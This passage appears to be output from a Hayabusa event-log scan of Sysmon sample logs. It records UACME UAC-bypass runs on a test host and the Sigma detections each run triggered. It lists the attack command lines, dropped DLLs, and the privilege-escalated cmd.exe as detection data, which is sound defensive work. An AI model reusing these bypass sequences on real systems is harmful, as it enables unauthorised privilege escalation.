SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 
747F3D96-7935-5D45-0000-001066CA0701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 
747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 
747F3D96-7EE2-5D45-0000-0010F19E2801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:38.640 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 
747F3D96-7EF1-5D45-0000-0010DDBF2901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.525 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.782 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.101 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 
+09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | LID: 0x18d3b3 | PID: 6236 | PGUID: 747F3D96-9124-5D45-0000-00103B986101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.461 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\fubuki.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3180 | Src PGUID: 747F3D96-9124-5D45-0000-001022926101 | Tgt PID: 6236 | Tgt PGUID: 747F3D96-9124-5D45-0000-00103B986101,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 39 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\explorer.exe | PID: 4480 | PGUID: 747F3D96-A356-5D45-0000-001029AA9901,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using .NET Code Profiler on MMC,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3fb | PID: 1492 | PGUID: 747F3D96-A356-5D45-0000-0010C5C59901",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 376 0000028064463A00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7840 | PGUID: 747F3D96-A356-5D45-0000-001006D49901,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 
